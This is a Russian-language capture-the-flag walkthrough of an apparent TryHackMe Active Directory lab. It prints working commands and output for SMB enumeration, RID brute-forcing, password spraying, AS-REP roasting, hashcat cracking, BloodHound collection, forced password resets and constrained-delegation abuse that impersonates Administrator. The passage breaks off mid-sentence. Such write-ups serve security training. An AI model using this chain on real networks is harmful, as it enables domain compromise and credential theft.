\u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0433\u043e\u0441\u0442\u0435\u0432\u043e\u0439 \u0448\u0430\u0440\u0435. \u041e\u0442\u0442\u0443\u0434\u0430 \u0434\u043e\u0441\u0442\u0430\u0435\u043c \u0444\u0430\u0439\u043b \u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u043c, \u043d\u043e \u043d\u0435 \u0437\u043d\u0430\u0435\u043c \u043e\u0442 \u043a\u0430\u043a\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438. \u041f\u0440\u043e\u0432\u043e\u0434\u0438\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u044e\u0437\u0435\u0440\u043e\u0432, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u0438 \u043d\u0430\u0445\u043e\u0434\u0438\u043c 1 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043a \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u044d\u0442\u043e\u0442 \u043f\u0430\u0440\u043e\u043b\u044c. \u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e BloodHound \u0438 \u043f\u043e \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u043c \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430\u043c \u0443 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u0435\u0441\u0442\u044c \u043f\u0440\u0430\u0432\u0430 Unconstrained Delegation Privilege \u043d\u0430 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 S4U2self, \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u0431\u0438\u043b\u0435\u0442 \u043d\u0430 \u0438\u043c\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440.\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 (T1595.002)\u041f\u0435\u0440\u0432\u0438\u0447\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0446\u0435\u043b\u0438, \u0441\u0431\u043e\u0440 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.PORT     STATE SERVICE       VERSION53\/tcp   open  domain        Simple DNS Plus88\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-19 12:08:47Z)135\/tcp  open  msrpc         Microsoft Windows RPC139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn389\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)445\/tcp  open  microsoft-ds?464\/tcp  open  kpasswd5?593\/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0636\/tcp  open  tcpwrapped3268\/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)3269\/tcp open  tcpwrapped3389\/tcp open  ms-wbt-server Microsoft Terminal Services\u0417\u0434\u0435\u0441\u044c \u0443 \u043d\u0430\u0441 \u043f\u043e\u0440\u0442\u044b, \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0435 \u0434\u043b\u044f Active Directory. \u041f\u043e\u043b\u043d\u044b\u0439 \u043d\u0430\u0431\u043e\u0440 \u043e\u0442 smb \u0434\u043e rdp. \u0422\u0430\u043a\u0436\u0435 \u0432\u0438\u0434\u0438\u043c \u0434\u043e\u043c\u0435\u043d, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0432 \/etc\/hosts.\u041f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u0435\u041d\u0430\u0447\u043d\u0435\u043c \u0441 smb \u0448\u0430\u0440, \u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0443\u0437\u043d\u0430\u0442\u044c \u0431\u0430\u0437\u043e\u0432\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d\u043e \u043d\u0430\u043c, \u0445\u043e\u0442\u044c \u0447\u0442\u043e-\u0442\u043e \u0441 \u0433\u043e\u0441\u0442\u0435\u0432\u044b\u043c \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u043c.nxc smb 10.114.158.248  -u &#8216;guest&#8217; -p &#187; SMB         10.114.158.248  445    HAYSTACK         [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:None) (Null Auth:True)SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\\guest: \u0413\u043e\u0441\u0442\u044f \u0432 \u044d\u0442\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u044e\u0442 \u0437\u0430 \u0441\u0432\u043e\u0435\u0433\u043e, \u043f\u043e\u044d\u0442\u043e\u043c \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0448\u0430\u0440 \u0438 \u044e\u0437\u0435\u0440\u043e\u0432.\u0421\u043f\u0438\u0441\u043e\u043a \u044e\u0437\u0435\u0440\u043e\u0432 \u043d\u0430 \u0434\u0430\u043d\u043d\u043e\u043c \u044d\u0442\u0430\u043f\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c, \u043e\u0434\u043d\u0430\u043a\u043e \u0441\u043f\u0438\u0441\u043e\u043a \u0448\u0430\u0440 \u0435\u0441\u0442\u044c. ~  nxc smb 10.114.158.248  -u &#8216;guest&#8217; -p &#187; &#8212;shares &#8212;users                                SMB         10.114.158.248  445    HAYSTACK         [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:None) (Null Auth:True)SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\\guest: SMB         10.114.158.248  445    HAYSTACK         [*] Enumerated sharesSMB         10.114.158.248  445    HAYSTACK         Share           Permissions     RemarkSMB         10.114.158.248  445    HAYSTACK         &#8212;&#8212;           &#8212;&#8212;&#8212;&#8212;     &#8212;&#8212;SMB         10.114.158.248  445    HAYSTACK         ADMIN$                          Remote AdminSMB         10.114.158.248  445    HAYSTACK         C$                              Default shareSMB         10.114.158.248  445    HAYSTACK         Data            READ,WRITE      SMB         10.114.158.248  445    HAYSTACK         IPC$            READ            Remote IPCSMB         10.114.158.248  445    HAYSTACK         NETLOGON                        Logon server share SMB         10.114.158.248  445    HAYSTACK         SYSVOL                          Logon server share \u0428\u0430\u0440\u0430 Data \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e. \u0417\u0430\u0445\u043e\u0434\u0438\u043c \u043f\u043e \u0434\u043e\u043c\u0435\u043d\u0443 \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f.Data smb\u0412\u0438\u0434\u0438\u043c 3 \u0444\u0430\u0439\u043b\u0430, \u043f\u0440\u0438\u0447\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043e\u043d\u0438 \u043c\u0435\u043d\u044f\u044e\u0442 \u0441\u0432\u043e\u0438 \u0438\u043c\u0435\u043d\u0430. \u041d\u0438\u043a\u043e\u0433\u0434\u0430 \u0440\u0430\u043d\u0435\u0435 \u0442\u0430\u043a\u043e\u0433\u043e \u043d\u0435 \u0432\u0438\u0434\u0435\u043b, \u043d\u043e \u0434\u0430 \u043b\u0430\u0434\u043d\u043e. \u042f \u0440\u0435\u0448\u0438\u043b \u0441\u043a\u0430\u0447\u0430\u0442\u044c txt \u0444\u0430\u0439\u043b, \u043e\u043d \u0432\u0435\u0441\u0438\u0442, \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043d\u0438\u0447\u0435\u0433\u043e.get g1di0c4x.tb5.txtgetting file \\onboarding\\g1di0c4x.tb5.txt of size 521 as g1di0c4x.tb5.txt (1.3 KiloBytes\/sec) (average 1.3 KiloBytes\/sec)\u0415\u0433\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0432\u043e\u0442 \u0442\u0430\u043a:Subject: Welcome to Reset &#8212;\u00a0Dear &lt;USER&gt;,Welcome aboard! We are thrilled to have you join our team. As discussed during the hiring process, we are sending you the necessary login information to access your company account. Please keep this information confidential and do not share it with anyone.The initial passowrd is: ********We are confident that you will contribute significantly to our continued success. We look forward to working with you and wish you the very best in your new role.Best regards,The Reset Team\u041e\u0442\u043b\u0438\u0447\u043d\u043e, \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c, \u043e\u0434\u043d\u0430\u043a\u043e \u043e\u0442 \u043a\u0430\u043a\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0435\u0449\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u043e\u0438\u0442 \u0432\u044b\u044f\u0441\u043d\u0438\u0442\u044c.\u0412\u044b\u0448\u0435 \u044f \u043f\u0438\u0441\u0430\u043b, \u0447\u0442\u043e \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0434\u043e\u0441\u0442\u0430\u0442\u044c \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c. \u041e\u0434\u043d\u0430\u043a\u043e \u0435\u0441\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c nxc smb \u0441 \u0444\u043b\u0430\u0433\u043e\u043c &#8212;rid-brute, \u0442\u043e \u043f\u043e\u043b\u044c\u0437\u0430\u043a\u0438 \u043f\u0440\u0435\u043a\u0440\u0430\u0441\u043d\u043e \u0434\u0430\u043c\u043f\u044f\u0442\u0441\u044f. \u0412\u0441\u044e \u043f\u043e\u0440\u0442\u044f\u043d\u043a\u0443 \u043f\u043e\u0441\u0442\u0438\u0442\u044c \u043d\u0435 \u0431\u0443\u0434\u0443\u2026rid-brute\u041f\u0435\u0440\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430\u041e\u0442\u043b\u0438\u0447\u043d\u043e, \u0442\u0435\u043f\u0435\u0440\u044c \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043e\u0434\u043d\u0430\u043a\u043e \u0432 \u0442\u0430\u043a\u043e\u043c \u0432\u0438\u0434\u0435, \u043d\u0435\u043b\u044c\u0437\u044f \u0437\u0430\u043a\u0438\u043d\u0443\u0442\u044c \u0432 netexec, \u0447\u0442\u043e\u0431\u044b \u043e\u043d \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b \u043a \u043a\u0430\u043a\u043e\u043c\u0443 \u0438\u043c\u0435\u043d\u043d\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u043f\u0430\u0440\u043e\u043b\u044c.\u0412\u0435\u0441\u044c \u0432\u044b\u0432\u043e\u0434 &#8212;rid-brute \u044f \u0441\u043e\u0445\u043e\u0430\u043d\u0438\u043b \u0432 \u0444\u0430\u0439\u043b users.txt. \u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0443\u0442\u0438\u043b\u0438\u0442\u044b awk \u0443\u0434\u0430\u043b\u0438\u043b \u0432\u0441\u0435 \u043b\u0438\u0448\u043d\u0438\u0435 \u0441\u0442\u043e\u043b\u0431\u0446\u044b, \u043f\u0440\u0435\u0444\u0438\u043a\u0441\u044b \u0438 \u043f\u0440\u043e\u0431\u0435\u043b\u044b.awk -F&#8217;\\\\\\\\| \\\\(&#8216; &#8216;\/SidTypeUser\/ {print $2}&#8217; user.txt &gt; users1.txt\/SidTypeUser\/ \u2014 \u0438\u0449\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u0435 \u0441\u0442\u0440\u043e\u043a\u0438, \u0433\u0434\u0435 \u0442\u0438\u043f\u043e\u043c \u043e\u0431\u044a\u0435\u043a\u0442\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c (\u0438\u0433\u043d\u043e\u0440\u0438\u0440\u0443\u0435\u0442 \u0433\u0440\u0443\u043f\u043f\u044b \u0438 \u0430\u043b\u0438\u0430\u0441\u044b).-F\u2019\\\\| \\(\u2019 \u2014 \u0433\u043e\u0432\u043e\u0440\u0438\u043c awk, \u0447\u0442\u043e \u0441\u0442\u0440\u043e\u043a\u0430 \u0434\u0435\u043b\u0438\u0442\u0441\u044f \u043b\u0438\u0431\u043e \u043f\u043e \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u043c\u0443 \u0441\u043b\u044d\u0448\u0443 \\ (\u0432 \u0434\u043e\u043c\u0435\u043d\u0435 THM), \u043b\u0438\u0431\u043e \u043f\u043e \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u201c\u043f\u0440\u043e\u0431\u0435\u043b + \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u044e\u0449\u0430\u044f \u0441\u043a\u043e\u0431\u043a\u0430\u201d  (.{print $2} \u2014 \u0432\u044b\u0432\u043e\u0434\u0438\u0442 \u0440\u043e\u0432\u043d\u043e \u0442\u043e, \u0447\u0442\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043c\u0435\u0436\u0434\u0443 \u043d\u0438\u043c\u0438 (\u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f).users1.txt \u2014 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0432 \u043d\u043e\u0432\u044b\u0439 \u0444\u0430\u0439\u043b.\u0412\u043e\u0442 \u0441 \u044d\u0442\u0438\u043c \u0444\u0430\u0439\u043b\u043e\u043c, \u0443\u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u0448\u0442\u0443\u0440\u043c\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439. ~  nxc smb 10.114.158.248  -u &#8216;users1.txt&#8217; -p &#8216;******!&#8217; &#8230; SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\\LILY_ONEILL:****** (Guest)\u042f \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0440\u0430\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u043b, \u0447\u0442\u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0431\u0443\u0434\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c, \u043e\u0434\u043d\u0430\u043a\u043e \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u0438 \u0442\u0430\u043a \u0441\u043e\u0439\u0434\u0435\u0442.\u041f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043b \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u0441\u044f \u043f\u043e rdp, \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b smb \u0448\u0430\u0440\u044b, \u043d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0433\u043e \u043d\u0435 \u043d\u0430\u0448\u0435\u043b.\u0414\u0430\u043b\u0435\u0435 \u044f \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c Kerberos. \u0412 impacket \u0435\u0441\u0442\u044c \u043c\u043e\u0434\u0443\u043b\u044c GetNPUsers, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0430\u0442\u0430\u043a\u0438 \u0442\u0438\u043f\u0430 AS-REP Roasting \u0432 Active Directory.\u041e\u043d \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c Kerberos AS-REP \u0445\u0435\u0448\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0443 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043e\u043f\u0446\u0438\u044f \u201cDo not require Kerberos preauthentication\u201d.\u041f\u0435\u0440\u0435\u0434 \u044d\u0442\u0438\u043c \u043c\u043e\u0436\u043d\u043e \u0435\u0449\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u0447\u0442\u043e \u0432\u0441\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0432\u0430\u043b\u0438\u0434\u043d\u044b\u0435. ~  kerbrute userenum users1.txt \\  -d thm.corp \\  &#8212;dc 10.114.158.248\u0410 \u0434\u0430\u043b\u0435\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c impacket\u2026~  impacket-GetNPUsers thm.corp\/ -no-pass \\  -usersfile \/tmp\/users1.txt \\  -dc-ip 10.114.158.248 \\  -format hashcatimpacket-getnpusers\u0417\u0434\u0435\u0441\u044c 3 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043b\u044e\u0431\u0435\u0437\u043d\u043e \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0445\u044d\u0448\u0438. \u041b\u043e\u043c\u0430\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e 1 \u0438 \u044d\u0442\u043e TABATHA_BRITT.\u0414\u0430\u043b\u0435\u0435 \u043b\u043e\u043c\u0430\u0435\u043c \u0447\u0435\u0440\u0435\u0437 hashcat, \u043e\u043d \u0443\u0436\u0435 \u0441\u0430\u043c \u0443\u043c\u0435\u0435\u0442 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0442\u044c \u0442\u0438\u043f \u0445\u044d\u0448\u0430.hashcat ker.txt \/usr\/share\/wordlists\/rockyou.txthashcat\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435\u042d\u0442\u043e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c, \u0443\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u0440\u0430\u0432\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0431\u043b\u0430\u0433\u0430\u043c\u0438 \u0447\u0435\u043b\u043e\u0432\u0435\u0447\u0435\u0441\u0442\u0432\u0430 \u0438 rdp. \u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f, \u043d\u043e \u0444\u043b\u0430\u0433\u0430 \u0437\u0434\u0435\u0441\u044c \u043d\u0435\u0442. \u041f\u043e\u0431\u0440\u043e\u0434\u0438\u0432 \u043f\u043e \u043f\u0430\u043f\u043a\u0430\u043c, \u043d\u0438\u0447\u0435\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u043d\u0435 \u043d\u0430\u0448\u0435\u043b, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u043e\u0435\u0445\u0430\u043b\u0438 \u0441\u043e\u0431\u0438\u0440\u0430\u0442\u044c \u0438\u043d\u0444\u0443 \u0438 \u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u043a\u0442\u043e \u043c\u044b \u0438 \u0447\u0442\u043e \u043c\u044b.\u0417\u0430\u0432\u043e\u0434\u0438\u043c BloodHound \u0438 \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u043c, \u0432\u0441\u0435, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u043c.bloodhound-ce-python -d thm.corp -ns 10.114.158.248 \\     -dc thm.corp &#8212;zip -c all \\     -u &#8216;TABATHA_BRITT&#8217; -p &#8216;*******&#8217;\u041d\u0430 \u0432\u044b\u0445\u043e\u0434\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0430\u0440\u0445\u0438\u0432, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c \u0438 \u0441\u043c\u043e\u0442\u0440\u0438\u043c.Bloodhound_recon\u0417\u0434\u0435\u0441\u044c \u0443 \u043d\u0430\u0441 \u043a\u0430\u0440\u0442\u0438\u043d\u0430 \u043f\u0440\u044f\u043c\u043e \u0441\u043a\u0430\u0436\u0435\u043c \u043e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u0430\u044f.\u041f\u0440\u044f\u043c\u043e \u0441\u0435\u0439\u0447\u0430\u0441 \u043c\u044b \u0441\u043c\u043e\u0436\u0435\u043c \u0430\u0431\u044c\u044e\u0437\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f SHAWNA_BRAY, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0438\u043c\u0435\u0435\u043c \u043f\u0440\u0430\u0432\u0430 GenericAll, \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043f\u043e\u043c\u0435\u043d\u044f\u0435\u043c \u043f\u0430\u0440\u043e\u043b\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e CRUZ_HALL \u0438 \u0442\u0430\u043a\u043e\u0439 \u0436\u0435 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u043e\u0439 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u0434\u043e DARLA_WINTERS.\u0413\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435\u0412 Bloodhound \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043e \u043a\u0430\u043a \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043a\u0440\u0435\u0434\u044b \u0434\u043b\u044f \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f.net rpc password &#171;SHAWNA_BRAY&#187; &#171;newP@ssword2022&#187; -U &#171;thm.corp&#187;\/&#187;TABATHA_BRITT&#187;%&#187;password&#187; -S &#171;thm.corp&#187;\u0417\u0430\u0442\u0435\u043c \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u0443 \u0438 \u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u0441\u044f \u043f\u043e\u0434 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c DARLA_WINTERS.\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0439\u0415\u0449\u0435 \u0440\u0430\u0437 \u043d\u0443\u0436\u043d\u043e \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437\u0443\u0447\u0438\u0442\u044c BloodHound.Constrained_delegation\u041c\u044b \u0432\u0438\u0434\u0438\u043c \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 Execution Prirvilege &#8212; Constrained Delegation. \u0412 Active Directory delegation \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u0435\u0440\u0432\u0438\u0441\u0443 \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\u0418\u043c\u0435\u043d\u043d\u043e \u0432 Constrained Delegation \u0441\u0435\u0440\u0432\u0438\u0441 \u043c\u043e\u0436\u0435\u0442 \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u0442\u044c TGS \u0442\u043e\u043b\u044c\u043a\u043e \u043a \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u043c.\u041d\u0430 \u0447\u0442\u043e \u0435\u0449\u0435 \u043d\u0443\u0436\u043d\u043e \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435. Trusted For Constrained Delegation: TRUE \u0438 AllowedToDelegate: cifs\/HayStack.thm.corp. \u042d\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c DARLA_WINTERS \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c Kerberos service tickets \u043a CIFS \u043d\u0430 HAYSTACK \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043b\u044e\u0431\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430.\u0410 CIFS = SMB.\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u043e\u0442 \u043c\u0438\u0441\u043a\u043e\u043d\u0444\u0438\u0433 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0431\u0438\u043b\u0435\u0442 \u0430\u0434\u043c\u0438\u043d\u0430.impacket-getST -spn &#8216;cifs\/haystack.thm.corp&#8217; -impersonate Administrator -dc-ip &#8216;thm.corp&#8217; &#8216;thm.corp\/DARLA_WINTERS:newP@ssword2022&#8217;Impacket v0.14.0.dev0 &#8212; Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping&#8230;[*] Getting TGT for user[*] Impersonating Administrator[*] Requesting S4U2self[*] Requesting S4U2Proxy[*] Saving ticket in Administrator@cifs_haystack.thm.corp@THM.CORP.ccache\u0417\u0434\u0435\u0441\u044c \u043e\u0447\u0435\u043d\u044c \u043b\u0435\u0433\u043a\u043e \u043e\u0448\u0438\u0431\u0438\u0442\u044c\u0441\u044f 